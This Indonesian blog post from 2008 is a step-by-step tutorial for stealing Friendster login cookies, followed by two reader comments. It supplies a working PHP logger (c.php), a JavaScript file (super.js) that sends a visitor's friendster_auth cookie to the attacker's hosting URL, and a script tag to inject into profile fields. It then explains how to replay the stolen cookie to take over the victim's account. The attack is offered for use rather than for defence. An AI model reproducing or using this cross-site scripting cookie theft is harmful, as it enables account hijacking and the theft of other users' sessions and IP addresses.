Mencuri Cookies di Friendster

Jumat, 15 Februari 2008

Cookies jelaslah sangat krusial. Apalagi di situs Friendster. Buat yg gak tau cookie, lebih baik cari info di abang Google, atau tante Yahoo, atau juga di embah Crankle, om AstaVista, dll.

Begini saja singkatnya. Cookie adalah suatu penanda yang diberikan suatu web server ke komputer kita sebagai tanda bahwa kita pernah mengunjungi situs yang bersangkutan. Nah, di beberapa situs semacam Friendster, kita akan diberikan sebuah Cookie khusus jika kita Log In ke situsnya. Nah, selama kita belum Log Out atau cookie tersebut dihapus, maka komputer tersebut akan selalu menampilkan halaman member yang bersangkutan jika membuka situs Friendster. Lalu, bagaimana jika Cookie tersebut kita curi dari member yang sedang log in?

Inilah topik yang cukup menarik. Setelah beberapa hari yang lalu saya membahas tentang Hack Friendster, saya kembali mengulasnya. Kenapa disini saya membahas mencuri Cookie di Friendster, bukan Cookie Yahoo? Ada beberapa alasan :

1. Friendster adalah situs yang cukup populer (ugh.. retoris)

2. Cookies-nya Friendster kadaluarsanya bertahun-tahun

Nah, alasan keuda-lah yang sebenarnya sangat krusial. Kalau Yahoo!, Cookies-nya punya kadaluarsa 24 Jam. Kalau Friendster, kalau gak salah kadaluarsanya bisa sampai 2015 lebih.

Oke, mulai saja tutorialnya dari mas Sepri.

Syarat yang Di Perlukan:

1.Punya Browser Mozzilla Firefox Dengan Add-On Cookie Editor!!
Kalo Belom Punya Klik Di SINI

2.Webhosting Untuk Penyimpanan Cookies Dan Code!!
Example:
http://www.ripway.com/ atau http://www.ifastnet.com Dan LAin2!!

3.Punya Account FriendSter Tentunya!!

Langkah-Langkahnya adalah:

1.Buat File PHP dengan nama c.php, (bisa buat di notepad ajah, tapi save dengan SAVE AS TYPE-nya All Files dan simpan dengan nama c.php). Isinya :

$cookie = $_GET[’c’];
$id = $_GET[’ses’];
$ip = getenv (’REMOTE_ADDR’);

if(strstr($cookie, “mac”)){
$fl = fopen(’lastkukis.txt’, ‘r’);
$buftxt = fgets($fl);
fclose($fl);
if($cookie!=$buftxt)
{
$date=date(”dmy.g:ia”);
$fl = fopen(’logkukis.txt’, ‘a’);
fwrite($fl, “\n”.$ip.’;;’.$id.’;;’.$date.”\n”.$cookie.”\n”);
fclose($fl);
$fl = fopen(’lastkukis.txt’, ‘w’);
fwrite($fl, $cookie);
fclose($fl);
}
}
echo “history.back(-1)”;
?>

2.Buat File Dengan Nama super.js Yang Isinya:

if (pageViewerID!=””){
var c=fgetCookie(”friendster_auth”);
if (c!=””)setTimeout(”window.location.href=’http://URLWEBHOSTING/c.php?c=’+escape(c)+’&ses=’+escape(pageViewerFName)+’~’+pageViewerID+’~@’+pageOwnerID”, 8000);}

JANGAN LUPA GANTI YANG BERCETAK TEBAL DENGAN URL WEB ANDA YANG ADA FILE PHP-NYA YANG SUDAH DI-UPLOAD

3.Dan Langkah Terakhir adalah Letakkan
Code INI:

<script type=”text/javascript” src=”http://URLWEBHOSTING/super.js” ></script>

ATAU

Nah….Klo Udah Dapet!!
Kamu Buka Link Ini:
ENCODER

Nah Setelah Itu Buka Cookie Editor Di Mozilla Dengan Cara:
Tools >>> Cookie Editor>>> ADD!!

ISI Dari Kolom Kosong Tersebut:
Name : friendster_auth
Content : hasil Encoder
Host : www.friendster.com
Path : /

EXPIRES: NEW EXPIRATION DATE
TAMBAHKAN NILAI TAHUN SAJA Dari 2007 Menjadi 2009 Atau 2015

Setelah Itu SAVE Dan Refresh friendSter-Nya

Semoga bermanfaat, teknik ini juga bisa diimplementasikan pada Media Box…..


[get this widget]

2 komentar:

Tes Aja mengatakan...

maaf mas..

langkah yg ke 3 ditaruh dmn mas...?

frank03 mengatakan...

bisa ditaroh di about me, who i want to meet, ato di media box (betul tak??)

jadi cookiesnya dicuri pas ada orang yg liat profile kita, atau gimana??